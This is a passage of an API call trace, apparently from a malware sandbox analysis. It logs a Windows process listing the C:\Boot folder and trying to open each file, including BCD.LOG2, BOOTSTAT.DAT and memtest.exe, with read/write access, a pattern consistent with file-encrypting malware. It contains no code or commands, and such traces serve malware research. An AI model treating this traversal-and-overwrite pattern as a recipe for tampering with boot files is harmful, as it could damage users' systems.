returned 0x32c0138 [0201.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.459] PathFindExtensionW (pszPath="C:\\Boot\\BCD.LOG2") returned=".LOG2" [0201.459] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0201.460] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0201.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0201.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0201.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.460] PathFindExtensionW (pszPath="C:\\Boot\\BOOTSTAT.DAT") returned=".DAT" [0201.460] CreateFileW (lpFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0201.460] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0201.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0201.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x32f9110 [0201.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92c8 [0201.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.460] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0201.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0201.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x38) returned 0x32ef238 [0201.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9318 [0201.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92c8 | out: hHeap=0x2c0000) returned 1 [0201.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0201.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0201.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.461] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0201.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0201.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x54) returned 0x32e5198 [0201.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92c8 [0201.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9228 [0201.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9318 | out: hHeap=0x2c0000) returned 1 [0201.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0201.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ef238 | out: hHeap=0x2c0000) returned 1 [0201.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0201.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.461] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0201.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0201.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2c88 [0201.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9318 [0201.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0201.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0201.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92c8 | out: hHeap=0x2c0000) returned 1 [0201.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9228 | out: hHeap=0x2c0000) returned 1 [0201.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0201.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0201.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0201.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.462] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0201.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0201.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa8) returned 0x3b2fd8 [0201.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9228 [0201.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92c8 [0201.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32c4e40 [0201.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32c4df0 [0201.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9318 | out: hHeap=0x2c0000) returned 1 [0201.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9200 | out: hHeap=0x2c0000) returned 1 [0201.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0201.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0201.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2c88 | out: hHeap=0x2c0000) returned 1 [0201.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0201.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.463] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0201.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0201.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0201.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.463] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0201.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0201.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfc) returned 0x32b69d8 [0201.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9200 [0201.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9318 [0201.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32c4e18 [0201.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32c4d50 [0201.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3b66078 [0201.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3b660a0 [0201.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9228 | out: hHeap=0x2c0000) returned 1 [0201.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92c8 | out: hHeap=0x2c0000) returned 1 [0201.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c4e40 | out: hHeap=0x2c0000) returned 1 [0201.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c4df0 | out: hHeap=0x2c0000) returned 1 [0201.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0201.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0201.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b2fd8 | out: hHeap=0x2c0000) returned 1 [0201.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0201.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.464] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0201.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0201.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0201.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.464] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0201.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0201.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92a0 [0201.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92c8 [0201.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0201.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0201.464] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0201.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0201.464] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0201.464] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0201.464] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0201.464] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0201.464] PathFindExtensionW (pszPath="C:\\Boot\\memtest.exe") returned=".exe" [0201.464] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0201.465] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0201.465] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0201.465] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0201.465] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0201.465] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0201.465] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0201.465] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0201.465] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0201.465] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0201.465] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0201.465] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0201.466] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, 